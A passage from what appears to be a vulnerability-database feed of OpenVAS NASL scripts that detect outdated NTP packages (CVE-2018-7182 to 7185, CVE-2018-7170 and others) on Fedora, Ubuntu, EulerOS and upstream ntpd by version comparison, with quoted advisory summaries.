$Id: gb_fedora_2018_7051d682fa_ntp_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for ntp FEDORA-2018-7051d682fa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875100\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-27 08:45:54 +0200 (Thu, 27 Sep 2018)\");\n script_cve_id(\"CVE-2018-12327\", \"CVE-2018-7170\", \"CVE-2016-1549\", \"CVE-2018-7182\",\n \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2018-7051d682fa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7051d682fa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TEPFU3UKOCOC2AUNLFMW6VQI3EN47FB6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.8p12~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7182"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-07-10T00:00:00", "id": "OPENVAS:1361412562310843586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843586", "type": "openvas", "title": "Ubuntu Update for ntp USN-3707-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3707_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for ntp USN-3707-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843586\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-10 05:56:31 +0200 (Tue, 10 Jul 2018)\");\n script_cve_id(\"CVE-2018-7182\", \"CVE-2018-7183\", \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for ntp USN-3707-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yihan Lian discovered that NTP incorrectly handled certain malformed mode 6\npackets. A remote attacker could possibly use this issue to cause ntpd to\ncrash, resulting in a denial of service. This issue only affected Ubuntu\n17.10 and Ubuntu 18.04 LTS. (CVE-2018-7182)\n\nMichael Macnair discovered that NTP incorrectly handled certain responses.\nA remote attacker could possibly use this issue to execute arbitrary code.\n(CVE-2018-7183)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain\nzero-origin timestamps. A remote attacker could possibly use this issue to\ncause a denial of service. This issue only affected Ubuntu 17.10 and Ubuntu\n18.04 LTS. 
(CVE-2018-7184)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain\nzero-origin timestamps. A remote attacker could possibly use this issue to\ncause a denial of service. (CVE-2018-7185)\");\n script_tag(name:\"affected\", value:\"ntp on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3707-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3707-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.6.p5+dfsg-3ubuntu2.14.04.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p10+dfsg-5ubuntu3.3\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p10+dfsg-5ubuntu7.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"ntp\", ver:\"1:4.2.8p4+dfsg-3ubuntu5.9\", rls:\"UBUNTU16.04 
LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-25T13:00:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7183", "CVE-2018-7182"], "description": "The host is running NTP.org", "modified": "2019-09-24T00:00:00", "published": "2018-03-07T00:00:00", "id": "OPENVAS:1361412562310812790", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812790", "type": "openvas", "title": "NTP.org 'ntpd' 'ctl_getitem()' And 'decodearr()' Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP 'ctl_getitem()' And 'decodearr()' Multiple Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ntp:ntp\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812790\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2018-7182\", \"CVE-2018-7183\");\n script_bugtraq_id(103191, 103351);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-07 11:25:49 +0530 (Wed, 07 Mar 2018)\");\n script_name(\"NTP.org 'ntpd' 'ctl_getitem()' And 'decodearr()' Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ntp_detect_lin.nasl\");\n script_mandatory_keys(\"ntpd/version/detected\");\n\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3412\");\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3414\");\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S\");\n\n script_tag(name:\"summary\", value:\"The host is running NTP.org's reference implementation\n of NTP server, ntpd and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to\n\n - An error in 'ctl_getitem()' which is used by ntpd to process incoming mode\n 6 packets. 
A malicious mode 6 packet can be sent to an ntpd instance,\n will cause 'ctl_getitem()' to read past the end of its buffer.\n\n - An error in 'decodearr()' which is used by ntpq can write beyond its buffer limit.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code and obtain sensitive information that may lead to\n further attacks.\");\n\n script_tag(name:\"affected\", value:\"NTP.org's ntpd versions from 4.2.8p6 and before 4.2.8p11.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to NTP version 4.2.8p11\n or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^4\\.2\\.8\") {\n if((revcomp(a:version, b:\"4.2.8p6\") >= 0) && (revcomp(a:version, b:\"4.2.8p11\") < 0)) {\n report = report_fixed_ver(installed_version:version, fixed_version:\"4.2.8p11\", install_path:location);\n security_message(port:port, proto:proto, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-14T16:53:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2015-5146", "CVE-2015-7973", "CVE-2015-7704", "CVE-2018-7183"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562311220201210", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201210", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1210)", "sourceData": 
"# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1210\");\n script_version(\"2020-03-13T07:14:54+0000\");\n script_cve_id(\"CVE-2015-5146\", \"CVE-2015-7973\", \"CVE-2018-7183\", \"CVE-2018-7184\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 07:14:54 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-13 07:14:54 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2020-1210)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1210\");\n script_xref(name:\"URL\", 
value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1210\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2020-1210 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"ntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the 'received' timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.(CVE-2018-7184)\n\nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.(CVE-2018-7183)\n\nNTP before 4.2.8p6 and 4.3.x before 4.3.90, when configured in broadcast mode, allows man-in-the-middle attackers to conduct replay attacks by sniffing the network.(CVE-2015-7973)\n\nntpd in ntp before 4.2.8p3 with remote configuration enabled allows remote authenticated users with knowledge of the configuration password and access to a computer entrusted to perform remote configuration to cause a denial of service (service crash) via a NULL byte in a crafted configuration directive packet.(CVE-2015-5146)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 
rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h12\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h12\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h12\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2015-5146", "CVE-2015-7973", "CVE-2015-7704", "CVE-2018-7183"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220192215", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220192215", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-2215)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.2215\");\n script_version(\"2020-01-23T12:40:10+0000\");\n script_cve_id(\"CVE-2015-5146\", \"CVE-2015-7973\", \"CVE-2018-7183\", \"CVE-2018-7184\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 12:40:10 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:40:10 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2019-2215)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-2215\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2215\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2019-2215 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"NTP before 4.2.8p6 and 4.3.x before 4.3.90, when configured in broadcast mode, allows man-in-the-middle attackers to conduct replay attacks by sniffing the network.(CVE-2015-7973)\n\nntpd in ntp before 4.2.8p3 with remote configuration 
enabled allows remote authenticated users with knowledge of the configuration password and access to a computer entrusted to perform remote configuration to cause a denial of service (service crash) via a NULL byte in a crafted configuration directive packet.(CVE-2015-5146)\n\nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.(CVE-2018-7183)\n\nntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the 'received' timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. This issue is a result of an incomplete fix for CVE-2015-7704.(CVE-2018-7184)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"sntp\", rpm:\"sntp~4.2.6p5~28.h12.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-25T13:00:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7170"], "description": "The host is running NTP.org", "modified": "2019-09-24T00:00:00", "published": "2018-03-07T00:00:00", "id": "OPENVAS:1361412562310812793", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812793", "type": "openvas", "title": "NTP.org 'ntpd' Authenticated Symmetric Passive Peering Remote Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP Authenticated Symmetric Passive Peering Remote Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ntp:ntp\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812793\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2018-7170\");\n script_bugtraq_id(103194);\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-07 12:17:55 +0530 (Wed, 07 Mar 2018)\");\n script_name(\"NTP.org 'ntpd' Authenticated Symmetric Passive Peering Remote Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ntp_detect_lin.nasl\");\n script_mandatory_keys(\"ntpd/version/detected\");\n\n script_xref(name:\"URL\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3454\");\n\n script_tag(name:\"summary\", value:\"The host is running NTP.org's reference implementation\n of NTP server, ntpd and is prone to a remote security vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exist due to if a system is\n set up to use a trustedkey and if one is not using the feature introduced in\n ntp-4.2.8p6 allowing an optional 4th field in the ntp.keys file to specify\n which IPs can serve time.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to bypass certain security restrictions and perform 
some unauthorized\n actions to the application. This may aid in further attacks.\");\n\n script_tag(name:\"affected\", value:\"NTP.org's ntpd version 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to NTP.org's ntpd version 4.2.8p7 or 4.2.8p11\n or 4.3.92.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"host_details.inc\");\n\nif(isnull(port = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_full(cpe:CPE, port:port))\n exit(0);\n\nif(!version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif(version =~ \"^4\\.2\") {\n if(revcomp(a:version, b:\"4.2.8p7\") < 0) {\n fix = \"4.2.8p7 or 4.2.8p11\";\n }\n}\nelse if(version =~ \"^4\\.3\") {\n if(revcomp(a:version, b:\"4.3.92\") < 0) {\n fix = \"4.3.92 or 4.2.8p11\";\n }\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:version, fixed_version:fix, install_path:location);\n security_message(port:port, proto:proto, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-09-25T13:00:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7185"], "description": "The host is running NTP.org", "modified": "2019-09-24T00:00:00", "published": "2018-03-07T00:00:00", "id": "OPENVAS:1361412562310812792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812792", "type": "openvas", "title": "NTP.org 'ntpd' 'protocol engine' Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP 'protocol engine' Denial of Service Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, 
http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ntp:ntp\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812792\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_cve_id(\"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-03-07 12:09:28 +0530 (Wed, 07 Mar 2018)\");\n script_name(\"NTP.org 'ntpd' 'protocol engine' Denial of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_ntp_detect_lin.nasl\");\n script_mandatory_keys(\"ntpd/version/detected\");\n\n script_xref(name:\"URL\", 